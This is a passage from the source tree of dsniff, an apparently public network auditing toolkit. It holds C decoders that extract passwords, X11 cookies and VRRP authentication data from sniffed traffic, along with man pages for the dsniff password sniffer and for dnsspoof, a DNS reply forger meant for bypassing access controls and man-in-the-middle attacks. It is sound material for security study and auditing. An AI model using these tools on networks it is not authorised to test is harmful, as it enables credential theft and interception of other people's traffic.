decode_ssh(u_char *buf, int len, u_char *obuf, int olen) { 19 | u_char *ptr = ""; 20 | 21 | if (!Opt_verbose) 22 | return 0; 23 | 24 | if (strncmp(buf, "SSH-", 4) != 0) 25 | return 0; 26 | 27 | if (dc_meta.rbuf != NULL) 28 | ptr = ascii_string(dc_meta.rbuf, dc_meta.rlen); 29 | 30 | snprintf(obuf, olen, "%s >>> %s", ascii_string(buf, len), ptr); 31 | 32 | return (strlen(obuf)); 33 | } 34 | 35 | -------------------------------------------------------------------------------- /decode_telnet.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_telnet.c 3 | * 4 | * Telnet. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_telnet.c,v 1.5 2001/03/15 08:33:03 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | #include 18 | 19 | #include "options.h" 20 | #include "decode.h" 21 | 22 | int 23 | decode_telnet(u_char *buf, int len, u_char *obuf, int olen) 24 | { 25 | if ((len = strip_telopts(buf, len)) == 0) 26 | return (0); 27 | 28 | if (!is_ascii_string(buf, len)) 29 | return (0); 30 | 31 | if (strip_lines(buf, Opt_lines) < 2) 32 | return (0); 33 | 34 | strlcpy(obuf, buf, olen); 35 | 36 | return (strlen(obuf)); 37 | } 38 | 39 | -------------------------------------------------------------------------------- /decode_vrrp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_vrrp.c 3 | * 4 | * Virtual Router Redundancy Protocol. 5 | * 6 | * Copyright (c) 2000 Eric Jackson 7 | * Copyright (c) 2000 Dug Song 8 | * 9 | * $Id: decode_vrrp.c,v 1.5 2001/03/15 08:33:03 dugsong Exp $ 10 | */ 11 | 12 | #include "config.h" 13 | 14 | #include 15 | 16 | #include 17 | #include 18 | #include 19 | 20 | #include "buf.h" 21 | #include "decode.h" 22 | 23 | struct vrrp_header { 24 | u_char vr_vers; /* Version */ 25 | u_char vr_vrid; /* Virtual Router ID */ 26 | u_char vr_prio; /* Router Priority */ 27 | u_char vr_naddr; /* # of addresses */ 28 | u_char vr_auth; /* Type of Authentication */ 29 | u_char vr_advr; /* ADVERTISEMENT Interval */ 30 | u_short vr_cksum; /* Checksum */ 31 | /* vr_naddr * 4 # of addresses */ 32 | }; 33 | #define VRRP_AUTH_NONE 0 34 | #define VRRP_AUTH_SIMPLE 1 35 | #define VRRP_AUTH_AH 2 36 | 37 | #define VRRP_AUTH_DATA_LEN 8 38 | 39 | int 40 | decode_vrrp(u_char *buf, int len, u_char *obuf, int olen) 41 | { 42 | struct buf *b, inbuf, outbuf; 43 | struct vrrp_header *vrrp; 44 | 45 | buf_init(&inbuf, buf, len); 46 | buf_init(&outbuf, obuf, olen); 47 | 48 | vrrp = (struct vrrp_header *)buf_ptr(&inbuf); 49 | 50 | if (buf_len(&inbuf) < sizeof(*vrrp)) 51 | return (0); 52 | 53 | /* We only care about VRRP_AUTH_SIMPLE */ 54 | if (ntohs(vrrp->vr_auth) != VRRP_AUTH_SIMPLE) 55 | return (0); 56 | 57 | /* XXX - probably want to verify checksum */ 58 | 59 | /* Forward to Authentication Data */ 60 | buf_skip(&inbuf, sizeof(*vrrp) + 8 + (vrrp->vr_naddr * 4)); 61 | 62 | if ((b = buf_tok(&inbuf, NULL, VRRP_AUTH_DATA_LEN)) == NULL) 63 | return (0); 64 | 65 | buf_put(&outbuf, buf_ptr(b), buf_len(b)); 66 | buf_put(&outbuf, "\n", 1); 67 | buf_end(&outbuf); 68 | 69 | return (buf_len(&outbuf)); 70 | } 71 | -------------------------------------------------------------------------------- /decode_x11.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_x11.c 3 | * 4 | * X11. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_x11.c,v 1.4 2001/03/15 08:33:03 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | #include "decode.h" 21 | 22 | int 23 | decode_x11(u_char *buf, int len, u_char *obuf, int olen) 24 | { 25 | char *p, *q; 26 | int i; 27 | 28 | p = buf + 12; 29 | 30 | if (strncmp(p, "MIT-MAGIC-COOKIE-1", 18) != 0 || len < 36) 31 | return (0); 32 | 33 | strlcpy(obuf, "MIT-MAGIC-COOKIE-1 ", olen); 34 | 35 | p += 20; 36 | len -= 20; 37 | q = obuf + 19; 38 | 39 | for (i = 0; i < 16 && i < len; i++) 40 | sprintf(q + (i * 2), "%.2x", (u_char)p[i]); 41 | strlcat(obuf, "\n", olen); 42 | 43 | return (strlen(obuf)); 44 | } 45 | 46 | -------------------------------------------------------------------------------- /decode_yp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_yp.c 3 | * 4 | * RPC "Yellow Pee". 5 | * 6 | * Totally untested, i don't run YP. Let me know if this works. :-) 7 | * 8 | * Copyright (c) 2000 Dug Song 9 | * 10 | * $Id: decode_yp.c,v 1.6 2001/03/15 08:33:03 dugsong Exp $ 11 | */ 12 | 13 | #include "config.h" 14 | 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include 22 | #include 23 | #include 24 | 25 | #include "rpc.h" 26 | #include "decode.h" 27 | 28 | /* XXX - varies on different systems :-( */ 29 | 30 | struct my_passwd { 31 | char *pw_name; 32 | char *pw_passwd; 33 | int pw_uid; 34 | int pw_gid; 35 | char *pw_gecos; 36 | char *pw_dir; 37 | char *pw_shell; 38 | }; 39 | 40 | struct my_yppasswd { 41 | char *oldpass; 42 | struct my_passwd newpw; 43 | }; 44 | 45 | static bool_t 46 | xdr_my_passwd(XDR *xdrs, struct my_passwd *objp) 47 | { 48 | if (xdr_string(xdrs, &objp->pw_name, ~0) && 49 | xdr_string(xdrs, &objp->pw_passwd, ~0) && 50 | xdr_int(xdrs, &objp->pw_uid) && 51 | xdr_int(xdrs, &objp->pw_gid) && 52 | xdr_string(xdrs, &objp->pw_gecos, ~0) && 53 | xdr_string(xdrs, &objp->pw_dir, ~0) && 54 | xdr_string(xdrs, &objp->pw_shell, ~0)) 55 | return (TRUE); 56 | 57 | return (FALSE); 58 | } 59 | 60 | static bool_t 61 | xdr_my_yppasswd(XDR *xdrs, struct my_yppasswd *objp) 62 | { 63 | if (xdr_string(xdrs, &objp->oldpass, ~0) && 64 | xdr_my_passwd(xdrs, &objp->newpw)) 65 | return (TRUE); 66 | 67 | return (FALSE); 68 | } 69 | 70 | int 71 | decode_yppasswd(u_char *buf, int len, u_char *obuf, int olen) 72 | { 73 | struct rpc_msg msg; 74 | struct my_yppasswd yp; 75 | XDR xdrs; 76 | int hdrlen; 77 | 78 | if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) 79 | return (0); 80 | 81 | obuf[0] = '\0'; 82 | 83 | if (msg.rm_direction == CALL && 84 | msg.rm_call.cb_prog == YPPASSWDPROG && 85 | msg.rm_call.cb_proc == YPPASSWDPROC_UPDATE) { 86 | xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); 87 | memset(&yp, 0, sizeof(yp)); 88 | if (xdr_my_yppasswd(&xdrs, &yp)) { 89 | snprintf(obuf, olen, 90 | "%s\n%s:%s:%d:%d:%s:%s:%s\n", 91 | yp.oldpass, yp.newpw.pw_name, 92 | yp.newpw.pw_passwd, yp.newpw.pw_uid, 93 | yp.newpw.pw_gid, yp.newpw.pw_gecos, 94 | yp.newpw.pw_dir, yp.newpw.pw_shell); 95 | } 96 | xdr_destroy(&xdrs); 97 | } 98 | return (strlen(obuf)); 99 | } 100 | 101 | int 102 | decode_ypserv(u_char *buf, int len, u_char *obuf, int olen) 103 | { 104 | struct rpc_msg msg; 105 | struct xid_map *xm; 106 | char *domain; 107 | bool_t status; 108 | XDR xdrs; 109 | int hdrlen; 110 | 111 | if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) 112 | return (0); 113 | 114 | obuf[0] = '\0'; 115 | 116 | if (msg.rm_direction == CALL && 117 | msg.rm_call.cb_prog == YPPROG && 118 | msg.rm_call.cb_proc == YPPROC_DOMAIN) { 119 | xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); 120 | domain = NULL; 121 | if (xdr_string(&xdrs, &domain, YPMAXDOMAIN)) { 122 | if ((domain = strdup(domain)) != NULL) 123 | xid_map_enter(msg.rm_xid, YPPROG, YPVERS, 124 | YPPROC_DOMAIN, (void *) domain); 125 | } 126 | xdr_destroy(&xdrs); 127 | } 128 | else if (msg.rm_direction == REPLY && 129 | (xm = xid_map_find(msg.rm_xid)) != NULL) { 130 | if (msg.rm_reply.rp_stat == MSG_ACCEPTED && 131 | msg.acpted_rply.ar_stat == SUCCESS) { 132 | xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, 133 | XDR_DECODE); 134 | if (xdr_bool(&xdrs, &status)) { 135 | if (status == TRUE) 136 | snprintf(obuf, olen, "%s\n", 137 | (char *)xm->data); 138 | } 139 | xdr_destroy(&xdrs); 140 | } 141 | free(xm->data); 142 | memset(xm, 0, sizeof(*xm)); 143 | } 144 | return (strlen(obuf)); 145 | } 146 | -------------------------------------------------------------------------------- /dnsspoof.8: -------------------------------------------------------------------------------- 1 | .TH DNSSPOOF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | dnsspoof 6 | \- 7 | forge replies to DNS address / pointer queries 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBdnsspoof\fR [\fB-i \fIinterface\fR] [\fB-f \fIhostsfile\fR] 13 | [\fIexpression\fR] 14 | .SH DESCRIPTION 15 | .ad 16 | .fi 17 | \fBdnsspoof\fR forges replies to arbitrary DNS address / pointer queries 18 | on the LAN. This is useful in bypassing hostname-based access controls, 19 | or in implementing a variety of man-in-the-middle attacks. 20 | .SH OPTIONS 21 | .IP "\fB-i \fIinterface\fR" 22 | Specify the interface to use. 23 | .IP "\fB-f \fIhostsfile\fR" 24 | Specify the pathname of a file in hosts(5) format. Only one hostname 25 | allowed per line (no aliases), although hostnames may contain 26 | wildcards (such as \fI*.doubleclick.net\fR). 27 | .IP "\fIexpression\fR" 28 | Specify a tcpdump(8) filter expression to select traffic to sniff. 29 | .LP 30 | If no \fIhostsfile\fR is specified, replies will be forged for all 31 | address queries on the LAN with an answer of the local machine's IP 32 | address. 33 | .SH FILES 34 | .IP \fI/usr/share/dsniff/dnsspoof.hosts\fR 35 | Sample hosts file. 36 | .SH "SEE ALSO" 37 | dsniff(8), hosts(5) 38 | .SH AUTHOR 39 | .na 40 | .nf 41 | Dug Song 42 | -------------------------------------------------------------------------------- /dnsspoof.hosts: -------------------------------------------------------------------------------- 1 | # $Id: dnsspoof.hosts,v 1.2 2000/08/28 13:28:21 dugsong Exp $ 2 | # 3 | # Sample hosts file for dnsspoof - kill web banner ads for Niels. :-) 4 | # 5 | 127.0.0.1 ad.* 6 | 127.0.0.1 ads*.* 7 | 127.0.0.1 adbot*.* 8 | 127.0.0.1 adcount*.* 9 | 127.0.0.1 adfinity*.* 10 | 127.0.0.1 adforce*.* 11 | 127.0.0.1 adimage*.* 12 | 127.0.0.1 adlink*.* 13 | 127.0.0.1 adserv*.* 14 | 127.0.0.1 adremote*.* 15 | 127.0.0.1 adv.* 16 | 127.0.0.1 advert*.* 17 | 127.0.0.1 banner*.* 18 | 127.0.0.1 count*.* 19 | 127.0.0.1 promo*.* 20 | 127.0.0.1 werbung*.* 21 | 127.0.0.1 *ads*.*.com 22 | 127.0.0.1 *.adbot.com 23 | 127.0.0.1 *.adone.com 24 | 127.0.0.1 *.adforce.com 25 | 127.0.0.1 *.ad-up.com 26 | 127.0.0.1 *.advert*.* 27 | 127.0.0.1 *.banner*.* 28 | 127.0.0.1 *.bfast.com 29 | 127.0.0.1 *.burstnet.com 30 | 127.0.0.1 *.doubleclick.net 31 | 127.0.0.1 *.focalink.com 32 | 127.0.0.1 *.flycast.com 33 | 127.0.0.1 *.freestats.com 34 | 127.0.0.1 *.hitbox.com 35 | 127.0.0.1 *.globaltrack.com 36 | 127.0.0.1 *.globaltrak.net 37 | 127.0.0.1 *.imagine-inc.com 38 | 127.0.0.1 *.imgis.com 39 | 127.0.0.1 *.link*.com 40 | 127.0.0.1 *.memory.net 41 | 127.0.0.1 *.preferences.com 42 | 127.0.0.1 *.smartclicks.com 43 | 127.0.0.1 *.sponsorpool.net 44 | 127.0.0.1 *.stats.net 45 | 127.0.0.1 *.stattrax.com 46 | 127.0.0.1 *.*tracker.com 47 | 127.0.0.1 *.valueclick.com 48 | 127.0.0.1 *.wisewire.com 49 | -------------------------------------------------------------------------------- /dsniff.8: -------------------------------------------------------------------------------- 1 | .TH DSNIFF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | dsniff 6 | \- 7 | password sniffer 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBdsniff\fR [\fB-v\fR] [\fB-c\fR] [\fB-a\fR] [\fB-d\fR] [\fB-m\fR] [\fB-D\fR] [\fB-N\fR] [\fB-P\fR] [\fB-i 13 | \fIinterface\fR | \fB-p \fIpcapfile\fR] [\fB-s \fIsnaplen\fR] [\fB-M \fImagics\fR] [\fB-f \fIservices\fR] 14 | [\fB-t \fItrigger[,...]\fR] 15 | [\fB-r\fR|\fB-w\fR \fIsavefile\fR] [\fIexpression\fR] 16 | .SH DESCRIPTION 17 | .ad 18 | .fi 19 | \fBdsniff\fR is a password sniffer which handles FTP, Telnet, SMTP, 20 | HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP 21 | MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, 22 | PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI 23 | Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase and Microsoft SQL 24 | protocols. 25 | .LP 26 | \fBdsniff\fR automatically detects and minimally parses each 27 | application protocol, only saving the interesting bits, and uses 28 | Berkeley DB as its output file format, only logging unique 29 | authentication attempts. Full TCP/IP reassembly is provided by 30 | libnids(3). 31 | .LP 32 | I wrote \fBdsniff\fR with honest intentions - to audit my own network, 33 | and to demonstrate the insecurity of cleartext network protocols. 34 | Please do not abuse this software. 35 | .SH OPTIONS 36 | .IP \fB-c\fR 37 | Perform half-duplex TCP stream reassembly, to handle asymmetrically 38 | routed traffic (such as when using arpspoof(8) to intercept client 39 | traffic bound for the local gateway). 40 | .IP \fB-v\fR 41 | Verbose. Show banners. 42 | .IP \fB-a\fR 43 | Show all results. Otherwise dsniff tries not to show to many duplicates. 44 | .IP \fB-d\fR 45 | Enable debugging mode. 46 | .IP \fB-m\fR 47 | Force protocol detection/DPI also on known services. For example, -m will detect SSH _and_ HTTPS on port 443. 48 | .IP \fB-N\fR 49 | Resolve IP addresses to hostnames. 50 | .IP \fB-P\fR 51 | Enable promisc mode. 52 | .IP \fB-C\fR 53 | Force color output even if not a tty. 54 | .IP \fB-D\fR 55 | Disable DPI. Only decode known services (DPI is enabled by default on unknown ports). 56 | .IP "\fB-i \fIinterface\fR" 57 | Specify the interface to listen on. 58 | .IP "\fB-p \fIpcapfile\fR" 59 | Rather than processing the contents of packets observed upon the network 60 | process the given PCAP capture file. 61 | .IP "\fB-s \fIsnaplen\fR" 62 | Analyze at most the first \fIsnaplen\fR bytes of each TCP connection, 63 | rather than the default of 1024. 64 | .IP "\fB-f \fIservices\fR" 65 | Load triggers from a \fIservices\fR file. Default is to use internal. 66 | .IP "\fB-M \fImagicfile\fR" 67 | Load \fImagics\fR from file. Default is to use internal. Can not be used with \fI-t\fR. 68 | .IP "\fB-t \fItrigger\fR[,...]" 69 | Load triggers from a comma-separated list, specified as 70 | \fIport\fR/\fIproto\fR=\fIservice\fR (e.g. 80/tcp=http). 71 | .IP "\fB-r \fIsavefile\fR" 72 | Read sniffed sessions from a \fIsavefile\fR created with the \fB-w\fR 73 | option. 74 | .IP "\fB-w \fIfile\fR" 75 | Write sniffed sessions to \fIsavefile\fR rather than parsing and 76 | printing them out. 77 | .IP "\fIexpression\fR" 78 | Specify a tcpdump(8) filter expression to select traffic to sniff. 79 | .LP 80 | On a hangup signal \fBdsniff\fR will dump its current trigger table to 81 | \fIdsniff.services\fR. 82 | .SH FILES 83 | .IP \fI/usr/share/dsniff/dsniff.services\fR 84 | Default trigger table 85 | .IP \fI/usr/share/dsniff/dsniff.magic\fR 86 | Network protocol magic 87 | .SH "SEE ALSO" 88 | arpspoof(8), libnids(3), services(5), magic(5) 89 | .SH AUTHOR 90 | .na 91 | .nf 92 | Dug Song 93 | .SH BUGS 94 | \fBdsniff\fR's automatic protocol detection feature is based on the 95 | classic file(1) command by Ian Darwin, and shares its historical 96 | limitations and bugs. 97 | -------------------------------------------------------------------------------- /dsniff.magic: -------------------------------------------------------------------------------- 1 | # $Id: dsniff.magic,v 1.8 2000/07/19 03:22:02 dugsong Exp $ 2 | # 3 | # Network protocol magic(5) for dsniff. 4 | # 5 | #0 string FLAPON aim 6 | 0 string BEGIN\ cvs 7 | 8 | 0 string SYST ftp 9 | 0 string USER\ ftp ftp 10 | 0 string USER\ anonymous ftp 11 | 12 | 0 string HELO\ smtp 13 | 0 string EHLO\ smtp 14 | 15 | 0 string GET\ / http 16 | 0 string POST\ / http 17 | 0 string CONNECT\ http 18 | 19 | 1 string \ ID\ imap 20 | 2 string \ ID\ imap 21 | 3 string \ ID\ imap 22 | 4 string \ ID\ imap 23 | 5 string \ ID\ imap 24 | 25 | 1 string \ LOGIN\ imap 26 | 2 string \ LOGIN\ imap 27 | 3 string \ LOGIN\ imap 28 | 4 string \ LOGIN\ imap 29 | 5 string \ LOGIN\ imap 30 | 31 | 1 string \ AUTHENTICATE\ PLAIN\ imap 32 | 2 string \ AUTHENTICATE\ PLAIN\ imap 33 | 3 string \ AUTHENTICATE\ PLAIN\ imap 34 | 4 string \ AUTHENTICATE\ PLAIN\ imap 35 | 5 string \ AUTHENTICATE\ PLAIN\ imap 36 | 37 | 0 string NICK\ irc 38 | 39 | 0 string USER\ pop 40 | 0 string AUTH\ pop 41 | 42 | 12 string MIT-MAGIC x11 43 | 44 | 0 string LIST nntp 45 | 0 string GROUP nntp 46 | 0 string NEW nntp 47 | 0 string ARTICLE nntp 48 | 49 | 0 belong 0x7f7f4943 50 | >4 beshort 0x4100 citrix 51 | 52 | #0 belong 0x0200e803 icq 53 | 54 | 0 beshort 0x1603 55 | >2 byte 0x01 56 | >>5 byte 0x01 57 | >>>9 byte 0x03 https 58 | 59 | 8 belong 0x0135012c 60 | >12 belong 0x0c010800 61 | >>16 belong 0x7fff7f08 62 | >>>20 belong 0x00000001 oracle 63 | 64 | 0 belong 0x0 65 | >4 byte 0x8d pcanywhere 66 | >5 byte 0x6 pcanywhere 67 | 68 | 132 belong 0x0301060a 69 | >242 belong 0 tds 70 | 32 belong 0xe0031000 71 | >36 belong 0x2c010000 tds 72 | 73 | 12 belong 100000 74 | >4 belong 0 75 | >>8 belong 2 portmap 76 | 12 belong 100005 77 | >4 belong 0 78 | >>8 belong 2 mountd 79 | 12 belong 100009 80 | >4 belong 0 81 | >>8 belong 2 yppasswd 82 | 83 | 16 belong 100000 84 | >8 belong 0 85 | >>12 belong 2 portmap 86 | 16 belong 100005 87 | >8 belong 0 88 | >>12 belong 2 mountd 89 | 16 belong 100009 90 | >8 belong 0 91 | >>12 belong 2 yppasswd 92 | 93 | 0 belong 296 94 | >4 belong 0x20000 postgresql 95 | 96 | 0 belong 0x81000048 97 | >33 string CACA smb 98 | 99 | 0 beshort >0xfff9 100 | >2 byte <40 101 | >>3 beshort >0xfff9 102 | >>>5 byte <40 telnet 103 | 104 | 0 string SSH- ssh 105 | 106 | #2 leshort 2 107 | #>(0.b+6) leshort 208 napster 108 | #>(0.b+6) leshort 2 napster 109 | 110 | 0 byte 0x38 111 | >8 belong 0x00002455 mmxp 112 | 113 | 0 byte 5 114 | >6 leshort 260 115 | >>32 byte 0 sniffer 116 | >6 leshort 261 117 | >>32 lelong -1 sniffer 118 | >1 belong 0 119 | >>5 byte 0 icq 120 | >(1.b+1) byte 1 socks 121 | 122 | 0 byte&0x1f 16 123 | >2 byte&0x1f 2 124 | >>5 byte 0x60 ldap 125 | >4 byte&0x1f 2 126 | >>5 beshort&0xfffc 0x0100 127 | >>>7 byte&0x1f 4 snmp 128 | -------------------------------------------------------------------------------- /dsniff.services: -------------------------------------------------------------------------------- 1 | # $Id: dsniff.services,v 1.8 2000/12/15 20:10:58 dugsong Exp $ 2 | # 3 | # Network services, dsniff style 4 | # 5 | ftp 21/tcp 6 | ssh 22/tcp 7 | telnet 23/tcp 8 | smtp 25/tcp 9 | pptp 47/ip 10 | http 80/tcp 11 | ospf 89/ip 12 | http 98/tcp 13 | poppass 106/tcp 14 | pop2 109/tcp 15 | pop3 110/tcp 16 | portmap 111/tcp 17 | portmap -111/tcp 18 | portmap 111/udp 19 | portmap -111/udp 20 | vrrp 112/ip 21 | nntp 119/tcp 22 | smb 139/tcp 23 | imap 143/tcp 24 | snmp 161/udp 25 | imap 220/tcp 26 | telnet 261/tcp 27 | ldap 389/tcp 28 | mmxp 417/tcp 29 | mmxp 417/udp 30 | https 443/tcp 31 | rlogin 512/tcp 32 | rlogin 513/tcp 33 | rlogin 514/tcp 34 | rip 520/udp 35 | smtp 587/tcp 36 | socks 1080/tcp 37 | tds 1433/tcp 38 | tds 1433/udp 39 | citrix 1494/tcp 40 | oracle 1521/tcp 41 | oracle 1526/tcp 42 | sniffer 2001/udp 43 | cvs 2401/tcp 44 | mmxp 2417/tcp 45 | mmxp 2417/udp 46 | tds 2638/tcp 47 | http 3128/tcp 48 | icq 4000/udp 49 | napster 4444/tcp 50 | aim 5190/tcp 51 | postgresql 5432/tcp 52 | napster 5555/tcp 53 | pcanywhere 5631/tcp 54 | x11 6000/tcp 55 | x11 6001/tcp 56 | x11 6002/tcp 57 | x11 6003/tcp 58 | x11 6004/tcp 59 | x11 6005/tcp 60 | napster 6666/tcp 61 | irc 6667/tcp 62 | irc 6668/tcp 63 | irc 6669/tcp 64 | tds 7599/tcp 65 | napster 7777/tcp 66 | http 8080/tcp 67 | napster 8888/tcp 68 | aim 9898/tcp 69 | pcanywhere 65301/tcp 70 | mountd 100005/rpc 71 | ypserv 100004/rpc 72 | yppasswd 100009/rpc 73 | -------------------------------------------------------------------------------- /dsniff_magic.h: -------------------------------------------------------------------------------- 1 | // grep -v ^# dsniff.magic | while read -r x; do echo '"'"${x//\\/\\\\}"'", \'; done >>dsniff_magic.h 2 | 3 | static char *mgx[] = {\ 4 | "0 string BEGIN\\ cvs", \ 5 | "", \ 6 | "0 string SYST ftp", \ 7 | "0 string USER\\ ftp ftp", \ 8 | "0 string USER\\ anonymous ftp", \ 9 | "", \ 10 | "0 string HELO\\ smtp", \ 11 | "0 string EHLO\\ smtp", \ 12 | "", \ 13 | "0 string GET\\ / http", \ 14 | "0 string POST\\ / http", \ 15 | "0 string CONNECT\\ http", \ 16 | "", \ 17 | "1 string \\ ID\\ imap", \ 18 | "2 string \\ ID\\ imap", \ 19 | "3 string \\ ID\\ imap", \ 20 | "4 string \\ ID\\ imap", \ 21 | "5 string \\ ID\\ imap", \ 22 | "", \ 23 | "1 string \\ LOGIN\\ imap", \ 24 | "2 string \\ LOGIN\\ imap", \ 25 | "3 string \\ LOGIN\\ imap", \ 26 | "4 string \\ LOGIN\\ imap", \ 27 | "5 string \\ LOGIN\\ imap", \ 28 | "", \ 29 | "1 string \\ AUTHENTICATE\\ PLAIN\\ imap", \ 30 | "2 string \\ AUTHENTICATE\\ PLAIN\\ imap", \ 31 | "3 string \\ AUTHENTICATE\\ PLAIN\\ imap", \ 32 | "4 string \\ AUTHENTICATE\\ PLAIN\\ imap", \ 33 | "5 string \\ AUTHENTICATE\\ PLAIN\\ imap", \ 34 | "", \ 35 | "0 string NICK\\ irc", \ 36 | "", \ 37 | "0 string USER\\ pop3", \ 38 | "0 string AUTH\\ pop3", \ 39 | "", \ 40 | "12 string MIT-MAGIC x11", \ 41 | "", \ 42 | "0 string LIST nntp", \ 43 | "0 string GROUP nntp", \ 44 | "0 string NEW nntp", \ 45 | "0 string ARTICLE nntp", \ 46 | "", \ 47 | "0 belong 0x7f7f4943", \ 48 | ">4 beshort 0x4100 citrix", \ 49 | "", \ 50 | "", \ 51 | "0 beshort 0x1603", \ 52 | ">2 byte 0x01", \ 53 | ">>5 byte 0x01", \ 54 | ">>>9 byte 0x03 https", \ 55 | "", \ 56 | "8 belong 0x0135012c", \ 57 | ">12 belong 0x0c010800", \ 58 | ">>16 belong 0x7fff7f08", \ 59 | ">>>20 belong 0x00000001 oracle", \ 60 | "", \ 61 | "0 belong 0x0", \ 62 | ">4 byte 0x8d pcanywhere", \ 63 | ">5 byte 0x6 pcanywhere", \ 64 | "", \ 65 | "132 belong 0x0301060a", \ 66 | ">242 belong 0 tds", \ 67 | "32 belong 0xe0031000", \ 68 | ">36 belong 0x2c010000 tds", \ 69 | "", \ 70 | "12 belong 100000", \ 71 | ">4 belong 0", \ 72 | ">>8 belong 2 portmap", \ 73 | "12 belong 100005", \ 74 | ">4 belong 0", \ 75 | ">>8 belong 2 mountd", \ 76 | "12 belong 100009", \ 77 | ">4 belong 0", \ 78 | ">>8 belong 2 yppasswd", \ 79 | "", \ 80 | "16 belong 100000", \ 81 | ">8 belong 0", \ 82 | ">>12 belong 2 portmap", \ 83 | "16 belong 100005", \ 84 | ">8 belong 0", \ 85 | ">>12 belong 2 mountd", \ 86 | "16 belong 100009", \ 87 | ">8 belong 0", \ 88 | ">>12 belong 2 yppasswd", \ 89 | "", \ 90 | "0 belong 296", \ 91 | ">4 belong 0x20000 postgresql", \ 92 | "", \ 93 | "0 belong 0x81000048", \ 94 | ">33 string CACA smb", \ 95 | "", \ 96 | "0 beshort >0xfff9", \ 97 | ">2 byte <40", \ 98 | ">>3 beshort >0xfff9", \ 99 | ">>>5 byte <40 telnet", \ 100 | "", \ 101 | "0 string SSH- ssh", \ 102 | "", \ 103 | "", \ 104 | "0 byte 0x38", \ 105 | ">8 belong 0x00002455 mmxp", \ 106 | "", \ 107 | "0 byte 5", \ 108 | ">6 leshort 260", \ 109 | ">>32 byte 0 sniffer", \ 110 | ">6 leshort 261", \ 111 | ">>32 lelong -1 sniffer", \ 112 | ">1 belong 0", \ 113 | ">>5 byte 0 icq", \ 114 | ">(1.b+1) byte 1 socks", \ 115 | "", \ 116 | "0 byte&0x1f 16", \ 117 | ">2 byte&0x1f 2", \ 118 | ">>5 byte 0x60 ldap", \ 119 | ">4 byte&0x1f 2", \ 120 | ">>5 beshort&0xfffc 0x0100", \ 121 | ">>>7 byte&0x1f 4 snmp", \ 122 | }; 123 | -------------------------------------------------------------------------------- /dsniff_services.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | //grep -v ^# dsniff.services | while read -r x; do s="${x##*$'\t'}"; echo -e '{"'"${x%%$'\t'*}"'"'", ${s%%\/*}, DSNIFF_SERVICE_${s##*/}},"; done | column -t >>dsniff_services.h 4 | 5 | struct _ds_service { 6 | char *name; 7 | int port; 8 | char *proto; 9 | }; 10 | 11 | #define DSNIFF_SERVICE_tcp "tcp" 12 | #define DSNIFF_SERVICE_ip "ip" 13 | #define DSNIFF_SERVICE_udp "udp" 14 | #define DSNIFF_SERVICE_rpc "rpc" 15 | static struct _ds_service dsx[] = { 16 | {"ftp", 21, DSNIFF_SERVICE_tcp}, 17 | {"ssh", 22, DSNIFF_SERVICE_tcp}, 18 | {"telnet", 23, DSNIFF_SERVICE_tcp}, 19 | {"smtp", 25, DSNIFF_SERVICE_tcp}, 20 | {"pptp", 47, DSNIFF_SERVICE_ip}, 21 | {"http", 80, DSNIFF_SERVICE_tcp}, 22 | {"ospf", 89, DSNIFF_SERVICE_ip}, 23 | {"http", 98, DSNIFF_SERVICE_tcp}, 24 | {"poppass", 106, DSNIFF_SERVICE_tcp}, 25 | {"pop2", 109, DSNIFF_SERVICE_tcp}, 26 | {"pop3", 110, DSNIFF_SERVICE_tcp}, 27 | {"portmap", 111, DSNIFF_SERVICE_tcp}, 28 | {"portmap", -111, DSNIFF_SERVICE_tcp}, 29 | {"portmap", 111, DSNIFF_SERVICE_udp}, 30 | {"portmap", -111, DSNIFF_SERVICE_udp}, 31 | {"vrrp", 112, DSNIFF_SERVICE_ip}, 32 | {"nntp", 119, DSNIFF_SERVICE_tcp}, 33 | {"smb", 139, DSNIFF_SERVICE_tcp}, 34 | {"imap", 143, DSNIFF_SERVICE_tcp}, 35 | {"snmp", 161, DSNIFF_SERVICE_udp}, 36 | {"imap", 220, DSNIFF_SERVICE_tcp}, 37 | {"telnet", 261, DSNIFF_SERVICE_tcp}, 38 | {"ldap", 389, DSNIFF_SERVICE_tcp}, 39 | {"mmxp", 417, DSNIFF_SERVICE_tcp}, 40 | {"mmxp", 417, DSNIFF_SERVICE_udp}, 41 | {"https", 443, DSNIFF_SERVICE_tcp}, 42 | {"rlogin", 512, DSNIFF_SERVICE_tcp}, 43 | {"rlogin", 513, DSNIFF_SERVICE_tcp}, 44 | {"rlogin", 514, DSNIFF_SERVICE_tcp}, 45 | {"rip", 520, DSNIFF_SERVICE_udp}, 46 | {"smtp", 587, DSNIFF_SERVICE_tcp}, 47 | {"socks", 1080, DSNIFF_SERVICE_tcp}, 48 | {"tds", 1433, DSNIFF_SERVICE_tcp}, 49 | {"tds", 1433, DSNIFF_SERVICE_udp}, 50 | {"citrix", 1494, DSNIFF_SERVICE_tcp}, 51 | {"oracle", 1521, DSNIFF_SERVICE_tcp}, 52 | {"oracle", 1526, DSNIFF_SERVICE_tcp}, 53 | 